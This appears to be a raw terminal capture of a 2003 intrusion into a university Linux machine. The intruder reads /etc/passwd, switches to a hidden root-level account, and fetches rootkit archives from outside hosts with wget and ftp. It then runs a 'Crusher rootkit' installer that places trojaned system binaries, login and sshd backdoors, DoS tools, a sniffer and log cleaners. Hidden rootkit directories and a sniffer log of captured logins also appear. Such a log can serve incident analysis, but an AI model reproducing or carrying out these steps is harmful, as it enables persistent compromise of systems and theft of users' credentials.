Sun Jun 8 16:00:29 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
unset HISTFILE
bash-2.04$ cat /etc/passwd
root:x:0:0:root:/root:/bin/tcsh
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:/sbin/bash
gopher:x:13:30:gopher:/usr/lib/gopher-data:
nscd:x:28:28:NSCD Daemon:/:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
ident:x:98:98:pident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/sbin/bash
named:x:25:25:Named:/var/named:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/bash
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
cheerie:x:500:500::/home/cheerie:/sbin/bash
noname:x:501:501::/home/noname:/sbin/bash
nasa:x:502:502::/home/nasa:/sbin/bash
guest:x:503:503::/home/guest:/sbin/bash
ftp:x:504:504::/home/ftp:/sbin/bash
inge2:x:0:0::/home/inge2:/sbin/bash
inge3:x:505:505::/home/inge3:/sbin/bash
bash-2.04$ suy� �� �� �����su inge2
�]0;@pc11: /�[root@pc11 /]# clera� �� �� �� �� ��������������clear
�[H�[2J�]0;@pc11: /�[root@pc11 /]# wget http://satumare.lookingat.us/kit.tar.gz
--14:59:51-- http://satumare.lookingat.us/kit.tar.gz
=> `kit.tar.gz'
Connecting to satumare.lookingat.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
0K ->
14:59:56 (162.11 KB/s) - `kit.tar.gz' saved [166]
�]0;@pc11: /�[root@pc11 /]# tar -xvzf kit.tar.gz
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error exit delayed from previous errors
�]0;@pc11: /�[root@pc11 /]# rm kit.tar.gz
�]0;@pc11: /�[root@pc11 /]# ftp someshit.netfirms.com
Connected to someshit.netfirms.com.
220 Ftp server ready.
500 Syntax error, command unrecognized.
500 Syntax error, command unrecognized.
KERBEROS_V4 rejected as an authentication type
Name (someshit.netfirms.com:inge3): someshit
331 User someshit okay, need password.
Password:
230-You are user #29 of 350 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> hash
Hash mark printing on (1024 bytes/hash mark).
ftp> cd www
250 "/www" is new cwd.
ftp> get mumu2.tar.gz
local: mumu2.tar.gz remote: mumu2.tar.gz
227 Entering Passive Mode (66,48,76,90,252,112)
150 Data connection accepted from 137.189.99.188:4123; transfer starting for mumu2.tar.gz (442599 bytes).
################################################################################################################################################################################################################################################################################################################################################################################################################################################
226 Transfer completed.
442599 bytes received in 3.4 seconds (1.3e+02 Kbytes/s)
ftp> bye
221 Goodbye.
�]0;@pc11: /�[root@pc11 /]# tar -xvzf mumu2.tar.gz
rk/
rk/du
rk/ls
rk/ps
rk/wp
rk/imp
rk/sl2
rk/top
rk/chsh
rk/find
rk/inet
rk/shad
rk/sshd/
rk/sshd/sshd
rk/sshd/sshd_config
rk/sshd/ssh_host_key
rk/sshd/init.sshd
rk/sshd/sshd-install
rk/vdir
rk/crontab-entry
rk/in.imapd
rk/killall
rk/install.log
rk/adore/
rk/adore/cleaner.c
rk/adore/ava.c
rk/adore/configure
rk/adore/dummy.c
rk/adore/adore.c
rk/adore/Makefile.gen
rk/adore/libinvisible.c
rk/adore/libinvisible.h
rk/clean
rk/md5bd
rk/login
rk/sense
rk/slice
rk/vadim
rk/linsniffer
rk/functions.save
rk/sysinfo
rk/syslogd
rk/netstat
rk/functions
rk/ifconfig
rk/pstree
rk/.1addr
rk/.1file
rk/.1logz
rk/.1proc
rk/xinetd
rk/atd.init
rk/syslogd.init
rk/install
�]0;@pc11: /�[root@pc11 /]# cd rk
�]0;@pc11: /rk�[root@pc11 /rk]# ./install
�[0m�[36m-=�[0m�[1;30m[�[0m�[1;32mCrusher rootkit�[0m�[1;30m]�[0m�[36m=-�[0m�[37m
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mInstalling trojaned programs...�[0m�[37m
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mchsh
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mps
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mtop
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mpstree�[0m�[1;31m *** failed ***�[0m�[37m
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mkillall
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mlscp: cannot remove `/usr/bin/dir': Permission denied
cp: cannot remove `/usr/bin/vdir': Permission denied
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mfind
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mdu
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mnetstat
�[0m�[36m|�[0m�[1;36m--- �[0m�[37msyslogd
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mlog cleaner
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mwp
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mshad
cp: cannot remove `/bin/shad': Permission denied
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mInstalling backdoors...�[0m�[37m
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mlogin
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mmd5bd
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mInstalling DoS programs...�[0m�[37m
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mvadim
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mimp
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mslice
�[0m�[36m|�[0m�[1;36m--- �[0m�[37msl2
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mInstalling sniffer...�[0m�[37m
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mTrying to install adore...�[0m�[37m�[0m�[36m|�[0m�[1;36m--- �[0m�[1;31m *** failed ***�[0m�[37m
�[0m�[36m|�[0m�[1;36m--- �[0m�[37mifconfig
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mInstalling sshd backdoor...�[0m�[37m
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mSetting up crontab entries...�[0m�[37m
�[0m�[1;32mopen ports:�[0m�[37m
java 179 root 4u IPv4 337 TCP *:120 (LISTEN)
mysqld 903 root 3u IPv4 1579 TCP *:mysql (LISTEN)
fam 7990 root 9u IPv4 94672 TCP *:6668 (LISTEN)
smbd 8028 root 13u IPv4 94807 TCP *:10003 (LISTEN)
mysqld 20438 root 3u IPv4 122962 TCP *:6010 (LISTEN)
mysqld 20514 root 3u IPv4 123108 TCP *:6011 (LISTEN)
sshd 20926 root 21u IPv4 124160 TCP *:555 (LISTEN)
sshd 20930 root 19u IPv4 124163 TCP *:2000 (LISTEN)
�[0m�[1;32mchecking for other rootkits:�[0m�[37m
�[0m�[1;31m/dev/ida/.inet�[0m�[37m
�[0m�[1;31m/etc/rc.d/init.d/init�[0m�[37m
�[0m�[1;31msuspect processes:�[0m�[37m
7990 ? S 0:17 ./fam
�[0m�[1;31m/dev filez:�[0m�[37m
/dev/ida/.sys/cleaner
/dev/ida/.inet/linsniffer
/dev/ida/.inet/logclear
/dev/ida/.inet/sense
/dev/ida/.inet/sshdu
/dev/ida/.inet/s
/dev/ida/.inet/ssh_host_key
/dev/ida/.inet/ssh_random_seed
/dev/ida/.inet/tcp.log
/dev/ida/.inet/pid
/dev/usb/core/ /.tools/ttywatcher/.#README.1.11
/dev/usb/core/ /.tools/ttywatcher/.#xview.c.1.6
/dev/usb/core/ /.tools/ttywatcher/ANNOUNCE
/dev/usb/core/ /.tools/ttywatcher/COPYRIGHT
/dev/usb/core/ /.tools/ttywatcher/CVS/Entries
/dev/usb/core/ /.tools/ttywatcher/CVS/Repository
/dev/usb/core/ /.tools/ttywatcher/CVS/Root
/dev/usb/core/ /.tools/ttywatcher/Makefile
/dev/usb/core/ /.tools/ttywatcher/Makefile.solaris
/dev/usb/core/ /.tools/ttywatcher/README
/dev/usb/core/ /.tools/ttywatcher/README.xview
/dev/usb/core/ /.tools/ttywatcher/TODO
/dev/usb/core/ /.tools/ttywatcher/XmATerm.c
/dev/usb/core/ /.tools/ttywatcher/XmATerm.h
/dev/usb/core/ /.tools/ttywatcher/XmATermP.h
/dev/usb/core/ /.tools/ttywatcher/common.c
/dev/usb/core/ /.tools/ttywatcher/curses.c
/dev/usb/core/ /.tools/ttywatcher/hash.c
/dev/usb/core/ /.tools/ttywatcher/init.c
/dev/usb/core/ /.tools/ttywatcher/main.c
/dev/usb/core/ /.tools/ttywatcher/motif.c
/dev/usb/core/ /.tools/ttywatcher/readpacket.c
/dev/usb/core/ /.tools/ttywatcher/sendpacket.c
/dev/usb/core/ /.tools/ttywatcher/ses_packet.h
/dev/usb/core/ /.tools/ttywatcher/ttywatcher.8
/dev/usb/core/ /.tools/ttywatcher/twtch/CVS/Entries
/dev/usb/core/ /.tools/ttywatcher/twtch/CVS/Repository
/dev/usb/core/ /.tools/ttywatcher/twtch/CVS/Root
/dev/usb/core/ /.tools/ttywatcher/twtch/Makefile
/dev/usb/core/ /.tools/ttywatcher/twtch/Makefile.solaris
/dev/usb/core/ /.tools/ttywatcher/twtch/README
/dev/usb/core/ /.tools/ttywatcher/twtch/driver4x.c
/dev/usb/core/ /.tools/ttywatcher/twtch/driver5x.c
/dev/usb/core/ /.tools/ttywatcher/twtch/install_driver
/dev/usb/core/ /.tools/ttywatcher/twtch/load4x
/dev/usb/core/ /.tools/ttywatcher/twtch/load5x
/dev/usb/core/ /.tools/ttywatcher/twtch/module4x.c
/dev/usb/core/ /.tools/ttywatcher/twtch/module5x.c
/dev/usb/core/ /.tools/ttywatcher/twtch/mon.c
/dev/usb/core/ /.tools/ttywatcher/twtch/popall
/dev/usb/core/ /.tools/ttywatcher/twtch/streams.c
/dev/usb/core/ /.tools/ttywatcher/twtch/twtch.h
/dev/usb/core/ /.tools/ttywatcher/twtch/twtchc.conf
/dev/usb/core/ /.tools/ttywatcher/xview.c
/dev/usb/core/ /.tools/dist/doord-src.tar.gz
/dev/usb/core/ /.tools/dist/ttysnoop-0.12d.tar.gz
/dev/usb/core/ /.tools/dist/ttywatcher-1.2.tar.gz
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoops.c
/dev/usb/core/ /.tools/ttysnoop-0.12d/README
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoop.c
/dev/usb/core/ /.tools/ttysnoop-0.12d/common.c
/dev/usb/core/ /.tools/ttysnoop-0.12d/common.h
/dev/usb/core/ /.tools/ttysnoop-0.12d/Makefile
/dev/usb/core/ /.tools/ttysnoop-0.12d/config.h
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoop.8
/dev/usb/core/ /.tools/ttysnoop-0.12d/snooptab.dist
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoops.o
/dev/usb/core/ /.tools/ttysnoop-0.12d/common.o
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoops
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoop.o
/dev/usb/core/ /.tools/ttysnoop-0.12d/ttysnoop
/dev/usb/core/ /.tools/unixKeyLogger.c
/dev/usb/core/ /.tools/nmap
/dev/usb/core/ /.snoop/snooptab
/dev/usb/core/ /ttysnoop-0.12c-5.i386.rpm
/dev/usb/core/ /ttysnoop-0.12d/ttysnoops.c
/dev/usb/core/ /ttysnoop-0.12d/README
/dev/usb/core/ /ttysnoop-0.12d/ttysnoop.c
/dev/usb/core/ /ttysnoop-0.12d/common.c
/dev/usb/core/ /ttysnoop-0.12d/common.h
/dev/usb/core/ /ttysnoop-0.12d/Makefile
/dev/usb/core/ /ttysnoop-0.12d/config.h
/dev/usb/core/ /ttysnoop-0.12d/ttysnoop.8
/dev/usb/core/ /ttysnoop-0.12d/snooptab.dist
/dev/usb/core/ /ttysnoop-0.12d/ttysnoops.o
/dev/usb/core/ /ttysnoop-0.12d/common.o
/dev/usb/core/ /ttysnoop-0.12d/ttysnoops
/dev/usb/core/ /ttysnoop-0.12d/ttysnoop.o
/dev/usb/core/ /ttysnoop-0.12d/ttysnoop
/dev/usb/core/ /ttysnoop-0.12d.tar.gz
/dev/usb/core/ /ttywatch-0.9/Makefile
/dev/usb/core/ /ttywatch-0.9/COPYING
/dev/usb/core/ /ttywatch-0.9/errors.c
/dev/usb/core/ /ttywatch-0.9/TODO
/dev/usb/core/ /ttywatch-0.9/errors.h
/dev/usb/core/ /ttywatch-0.9/logfile.c
/dev/usb/core/ /ttywatch-0.9/logfile.h
/dev/usb/core/ /ttywatch-0.9/socket.c
/dev/usb/core/ /ttywatch-0.9/socket.h
/dev/usb/core/ /ttywatch-0.9/telnet.c
/dev/usb/core/ /ttywatch-0.9/telnet.h
/dev/usb/core/ /ttywatch-0.9/ttywatch.8
/dev/usb/core/ /ttywatch-0.9/ttywatch.c
/dev/usb/core/ /ttywatch-0.9/ttywatch.conf
/dev/usb/core/ /ttywatch-0.9/ttywatch.h
/dev/usb/core/ /ttywatch-0.9/ttywatch.init
/dev/usb/core/ /ttywatch-0.9/ttywatch.logrotate
/dev/usb/core/ /ttywatch-0.9/ttywatch.spec
/dev/usb/core/ /ttywatch-0.9/ttywatch.o
/dev/usb/core/ /ttywatch-0.9/socket.o
/dev/usb/core/ /ttywatch-0.9/telnet.o
/dev/usb/core/ /ttywatch-0.9/logfile.o
/dev/usb/core/ /ttywatch-0.9/errors.o
/dev/usb/core/ /ttywatch-0.9/ttywatch
/dev/usb/core/ /ttywatch-0.9.tar.gz
/dev/usb/core/ /cryptcat_linux2.tar
/dev/usb/core/ /cryptcat/Changelog
/dev/usb/core/ /cryptcat/cryptcat
/dev/usb/core/ /cryptcat/farm9crypt.cc
/dev/usb/core/ /cryptcat/farm9crypt.h
/dev/usb/core/ /cryptcat/generic.h
/dev/usb/core/ /cryptcat/Makefile
/dev/usb/core/ /cryptcat/netcat.blurb
/dev/usb/core/ /cryptcat/netcat.c
/dev/usb/core/ /cryptcat/README
/dev/usb/core/ /cryptcat/README.cryptcat
/dev/usb/core/ /cryptcat/twofish2.cc
/dev/usb/core/ /cryptcat/twofish2.h
/dev/usb/core/ /cryptcat/farm9crypt.o
/dev/usb/core/ /cryptcat/twofish2.o
/dev/usb/core/ /cryptcat/bb
/dev/usb/core/ /cryptcat/netcat.c.orig
/dev/.r/bin/bash
/dev/.r/bin/ls
/dev/.r/bin/cp
/dev/.r/bin/login
/dev/.r/bin/ps
/dev/.r/bin/netstat
/dev/.r/bin/.ps.bak
/dev/.r/bin/kill
/dev/.r/sbin/bash
/dev/.r/sbin/fuser
/dev/.r/sbin/ifconfig
/dev/.r/sbin/klogd
/dev/.r/sbin/syslogd
/dev/.r/usr/bin/chsh
/dev/.r/usr/bin/cpp
/dev/.r/usr/bin/du
/dev/.r/usr/bin/find
/dev/.r/usr/bin/killall
/dev/.r/usr/bin/md5sum
/dev/.r/usr/bin/pstree
/dev/.r/usr/bin/ssh
/dev/.r/usr/bin/ssh-add
/dev/.r/usr/bin/ssh-agent
/dev/.r/usr/bin/top
/dev/.r/usr/bin/chattr
/dev/.r/usr/sbin/atd
/dev/.r/usr/sbin/in.telnetd
/dev/.r/usr/sbin/lsof
/dev/.r/usr/sbin/sshd
/dev/.r/usr/sbin/xinetd
/dev/.r/etc/rc.d/init.d/atd
/dev/.r/etc/rc.d/init.d/rwhod
/dev/.r/etc/rc.d/init.d/keytable
/dev/.r/etc/rc.d/init.d/nscd
/dev/.r/etc/rc.d/init.d/syslog
/dev/.r/etc/rc.d/init.d/gpm
/dev/.r/etc/rc.d/init.d/kudzu
/dev/.r/etc/rc.d/init.d/kdcrotate
/dev/.r/etc/rc.d/init.d/lpd
/dev/.r/etc/rc.d/init.d/autofs
/dev/.r/etc/rc.d/init.d/sendmail
/dev/.r/etc/rc.d/init.d/rhnsd
/dev/.r/etc/rc.d/init.d/functions
/dev/.r/etc/rc.d/init.d/halt
/dev/.r/etc/rc.d/init.d/killall
/dev/.r/etc/rc.d/init.d/netfs
/dev/.r/etc/rc.d/init.d/network
/dev/.r/etc/rc.d/init.d/random
/dev/.r/etc/rc.d/init.d/rawdevices
/dev/.r/etc/rc.d/init.d/single
/dev/.r/etc/rc.d/init.d/pcmcia
/dev/.r/etc/rc.d/init.d/apmd
/dev/.r/etc/rc.d/init.d/ipchains
/dev/.r/etc/rc.d/init.d/iptables
/dev/.r/etc/rc.d/init.d/identd
/dev/.r/etc/rc.d/init.d/portmap
/dev/.r/etc/rc.d/init.d/nfs
/dev/.r/etc/rc.d/init.d/nfslock
/dev/.r/etc/rc.d/init.d/pppoe
/dev/.r/etc/rc.d/init.d/crond
/dev/.r/etc/rc.d/init.d/anacron
/dev/.r/etc/rc.d/init.d/xfs
/dev/.r/etc/rc.d/init.d/isdn
/dev/.r/etc/rc.d/init.d/ypbind
/dev/.r/etc/rc.d/init.d/irda
/dev/.r/etc/rc.d/init.d/sshd
/dev/.r/etc/rc.d/init.d/rstatd
/dev/.r/etc/rc.d/init.d/rusersd
/dev/.r/etc/rc.d/init.d/rwalld
/dev/.r/etc/rc.d/init.d/xinetd
/dev/.r/etc/rc.d/init.d/yppasswdd
/dev/.r/etc/rc.d/init.d/ypserv
/dev/.r/etc/rc.d/init.d/innd
/dev/.r/etc/rc.d/init.d/mars-nwe
/dev/.r/etc/rc.d/init.d/postgresql
/dev/.r/etc/rc.d/init.d/httpd
/dev/.r/etc/rc.d/init.d/tux
/dev/.r/etc/rc.d/init.d/named
/dev/.r/etc/rc.d/init.d/snmpd
/dev/.r/etc/rc.d/init.d/arpwatch
/dev/.r/etc/rc.d/init.d/amd
/dev/.r/etc/rc.d/init.d/reconfig
/dev/.r/etc/rc.d/init.d/bootparamd
/dev/.r/etc/rc.d/init.d/dhcpd
/dev/.r/etc/rc.d/init.d/gated
/dev/.r/etc/rc.d/init.d/kadmin
/dev/.r/etc/rc.d/init.d/kprop
/dev/.r/etc/rc.d/init.d/krb524
/dev/.r/etc/rc.d/init.d/krb5kdc
/dev/.r/etc/rc.d/init.d/linuxconf
/dev/.r/etc/rc.d/init.d/mcserv
/dev/.r/etc/rc.d/init.d/mysqld
/dev/.r/etc/rc.d/init.d/ntpd
/dev/.r/etc/rc.d/init.d/ups
/dev/.r/etc/rc.d/init.d/ldap
/dev/.r/etc/rc.d/init.d/smb
/dev/.r/etc/rc.d/init.d/pxe
/dev/.r/etc/rc.d/init.d/rarpd
/dev/.r/etc/rc.d/init.d/routed
/dev/.r/etc/rc.d/init.d/squid
/dev/.r/etc/rc.d/init.d/vncserver
/dev/.r/etc/ssh/primes
/dev/.r/etc/ssh/ssh_config
/dev/.r/etc/ssh/sshd_config
/dev/.r/etc/ssh/ssh_host_key
/dev/.r/etc/ssh/ssh_host_key.pub
/dev/.r/etc/ssh/ssh_host_rsa_key
/dev/.r/etc/ssh/ssh_host_rsa_key.pub
/dev/.r/etc/ssh/ssh_host_dsa_key
/dev/.r/etc/ssh/ssh_host_dsa_key.pub
/dev/.r/boot/boot.b
/dev/.r/boot/chain.b
/dev/.r/boot/message
/dev/.r/boot/os2_d.b
/dev/.r/boot/kernel.h-2.4.2
/dev/.r/boot/kernel.h
/dev/.r/boot/System.map-2.4.2-2
/dev/.r/boot/module-info-2.4.2-2
/dev/.r/boot/vmlinux-2.4.2-2
/dev/.r/boot/vmlinuz-2.4.2-2
/dev/.r/boot/vmlinuz
/dev/.r/boot/System.map
/dev/.r/boot/module-info
/dev/.r/boot/boot.0300
/dev/.r/boot/map
/dev/.r/cool
/dev/mounnt
/dev/.../ /tzap.tgz
/dev/.../ /rk/chsh
/dev/.../ /rk/inet
/dev/.../ /rk/sense
/dev/.../ /rk/utils/suid
/dev/.../ /rk/login
/dev/.../ /rk/.proc
/dev/.../ /rk/.1file
/dev/.../ /rk/org
/dev/.../ /rk/ls
/dev/.../ /rk/vdir
/dev/.../ /rk/crontab-entry
/dev/.../ /rk/ps
/dev/.../ /rk/wp
/dev/.../ /rk/shad
/dev/.../ /rk/netstat
/dev/.../ /rk/xinetd
/dev/.../ /rk/find
/dev/.../ /rk/sshd/ssh_host_key
/dev/.../ /rk/sshd/init.sshd
/dev/.../ /rk/sshd/ssh
/dev/.../ /rk/sshd/sshd-install
/dev/.../ /rk/sshd/sshd_config
/dev/.../ /rk/sshd/install.log
/dev/.../ /rk/sshd/sshd.save
/dev/.../ /rk/sshd/sshd
/dev/.../ /rk/sshd/make-ssh-host-key
/dev/.../ /rk/sshd/make-ssh-known-hosts
/dev/.../ /rk/sshd/man6/ssh_config
/dev/.../ /rk/sshd/man6/sshd_config
/dev/.../ /rk/sshd/scp
/dev/.../ /rk/sshd/sourcemask
/dev/.../ /rk/sshd/ssh-add
/dev/.../ /rk/sshd/ssh-agent
/dev/.../ /rk/sshd/ssh-askpass
/dev/.../ /rk/sshd/ssh-keygen
/dev/.../ /rk/.1logz
/dev/.../ /rk/top
/dev/.../ /rk/install
/dev/.../ /rk/atd.init
/dev/.../ /rk/du
/dev/.../ /rk/pstree
/dev/.../ /rk/patch
/dev/.../ /rk/syslogd
/dev/.../ /rk/syslogd.init
/dev/.../ /rk/md5bd
/dev/.../ /rk/sysinfo
/dev/.../ /rk/linsniffer
/dev/.../ /rk/functions
/dev/.../ /rk/clean
/dev/.../ /rk/install.log
/dev/.../ /rk/killall
/dev/.../ /rk/.addr
/dev/x.pid
/dev/srd0
/dev/ssh_host_key
/dev/ssh_host_key.pub
/dev/ssh_random_seed
/dev/sshd_config
�[0m�[1;32mDone.�[0m�[37m
�[0m�[36m|�[0m�[1;36m= �[0m�[1;37mSetting up loading sniffer, Hiding processes ... pls wait�[0m�[37m
trying to resolve the hostname....
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
warning: locate : could not open database: /var/lib/slocate/slocate.db: No such file or directory
warning: You need to run the 'updatedb' command (as root) to create the database.
searching for running rk'z & trying to kill 'em.. please wait (this can take several minutes)
egrep: /usr/share/doc/db3-devel-3.1.17/examples_c/tags: No such file or directory
egrep: /usr/share/doc/db3-devel-3.1.17/examples_cxx/tags: No such file or directory
egrep: /usr/share/doc/screen-3.9.8/FAQ: No such file or directory
egrep: warning: /usr/bin/mh: recursive directory loop
egrep: /usr/bin/kbdrate: No such file or directory
egrep: /usr/bin/.tux/backup/locate: No such file or directory
egrep: /usr/bin/.tux/backup/updatedb: No such file or directory
(Interrupt -- one more to kill letter)
�]0;@pc11: /rk�[root@pc11 /rk]# can not chdir(/var/spool/mqueue): No such file or directory
�]0;@pc11: /rk�[root@pc11 /rk]# ls
�[01;32matd.init�[00m �[00mfunctions.save�[00m �[01;32mkillall�[00m �[01;32mpstree�[00m �[01;32mtop�[00m
�[01;32mchsh�[00m �[01;32mifconfig�[00m �[01;32mlinsniffer�[00m �[01;32msense�[00m �[01;32mvadim�[00m
�[01;32mclean�[00m �[01;32mimp�[00m �[01;32mlogin�[00m �[01;32msl2�[00m �[01;32mvdir�[00m
�[00mcrontab-entry�[00m �[01;32min.imapd�[00m �[01;32mls�[00m �[01;32mslice�[00m �[01;32mxinetd�[00m
�[01;32mdu�[00m �[01;32minet�[00m �[01;32mmd5bd�[00m �[01;32msysinfo�[00m
�[01;32mfind�[00m �[01;32minstall�[00m �[01;32mnetstat�[00m �[01;32msyslogd�[00m
�[01;32mfunctions�[00m �[00minstall.log�[00m �[01;32mps�[00m �[01;32msyslogd.init�[00m
�]0;@pc11: /rk�[root@pc11 /rk]# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
192.168.20.1 pc11 pc11.ie.cuhk.edu.hk
192.168.20.254 gateway
�]0;@pc11: /rk�[root@pc11 /rk]# cd /usr/local/games
�]0;@pc11: /usr/local/games�[root@pc11 games]# ls
�]0;@pc11: /usr/local/games�[root@pc11 games]# ./banner tcp.log
Sun Jun 8 15:07:07 HKT 2003
----------------------------------------------------------------------
[ 21] pc11 anonmyous acb@abc.com
[ 21] pc11 anonymous@ftp.adobe.com abc@126.com
[ 21] pc11 anonymous@ftp.microsoft.com abc@126.com
[ 21] pc11 guest guest
[ 23] pc11 "$#'d# 9600,9600#iest26:0.0VT100
[ 23] pc11 JJKE KI
[ 23] pc11 lol muie
[ 23] pc11 W{W{{ {{
513 pc11
513 pc11 _
513 pc11 ]]
513 pc11 &::
513 pc11 %)%)3.
513 pc11 8.8.
513 pc11 ^^A^A^Brootrootvt100/38400
513 pc11 aB{
513 pc11 b:b:
513 pc11 bS
513 pc11 bSbpY:RbpY:R
513 pc11 ]CK]CK
513 pc11 FF
513 pc11 ff5
513 pc11 G9G9
513 pc11 @@:gateway => pc11 [23]:Wze:gateway => pc11 [23]:[Y[Y[Y&& !"'#[Y[Y[Yd# 38400,38400#localhost:12.0'DISPLAYlocalhost:12.0VT100[Y[Y
513 pc11 gg6
513 pc11 |I
513 pc11 JJ.
513 pc11 L
513 pc11 LLLLrootrootvt100/38400
513 pc11 m3
513 pc11 MMe?
513 pc11 o
513 pc11 OLOLm
513 pc11 OO
513 pc11 -Q-Q8
513 pc11 RGRG-
513 pc11 RR.
513 pc11 W
513 pc11 WW
513 pc11 %%Xx
513 pc11 XX.\
----------------------------------------------------------------------
Sun Jun 8 15:07:07 HKT 2003
-------------------------------------------------------------------EOF
�]0;@pc11: /usr/local/games�[root@pc11 games]# ls
�]0;@pc11: /usr/local/games�[root@pc11 games]# mc
bash: mc: command not found
�]0;@pc11: /usr/local/games�[root@pc11 games]# netstat -tau
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 pc11:4120 gateway:2812 ESTABLISHED
tcp 0 0 pc11:mysql gateway:34423 ESTABLISHED
tcp 0 0 pc11:4119 gateway:2811 ESTABLISHED
tcp 0 0 pc11:mysql gateway:34422 ESTABLISHED
tcp 0 133 pc11:telnet 80.96.94.39:2756 ESTABLISHED
tcp 0 0 pc11:2000 80.96.94.39:3563 ESTABLISHED
tcp 0 0 *:6011 *:* LISTEN
tcp 0 0 *:6010 *:* LISTEN
tcp 0 0 *:120 *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:10003 *:* LISTEN
tcp 0 0 *:2000 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:6668 *:* LISTEN
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:login *:* LISTEN
udp 0 0 *:3049 *:*
udp 0 0 *:tftp *:*
udp 0 0 *:tftp *:*
�]0;@pc11: /usr/local/games�[root@pc11 games]# cd /usr/sbin
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# wget geocities.com/irina_cus/sock.tgz
--15:07:58-- http://geocities.com/irina_cus/sock.tgz
=> `sock.tgz'
Connecting to geocities.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,229 [application/x-compressed]
0K -> ... [100%]
15:07:58 (1.54 MB/s) - `sock.tgz' saved [3229/3229]
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# mv sock.tgz sock
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# chmod +x sock
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# ./sock
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 555 124160 0 20926 21 sshd
tcp 6668 94672 0 7990 9 fam
tcp 143 1305 0 771 9 xinetd
tcp 2000 124163 0 20930 19 sshd
tcp 10003 94807 0 8028 13 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 122962 0 20438 3 mysqld
tcp 6011 123108 0 20514 3 mysqld
tcp 2000 133570 0 21258 20 sshd
tcp 23 122921 0 20430 2 in.telnetd
tcp 4108 96977 0 7990 15 fam
tcp 3306 122957 0 20438 4 mysqld
tcp 4101 94679 0 7990 14 fam
tcp 4119 123025 0 20465 5 number_cum
tcp 3306 123102 0 20514 4 mysqld
tcp 4120 123171 0 20541 5 number_cum
udp 69 124237 0 20938 3 xinetd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost fam
fam: bad port number
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]#
�]0;@pc11: /usr/sbin�[root@pc11 sbin]# telnet localhost fam� �� �� �69
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
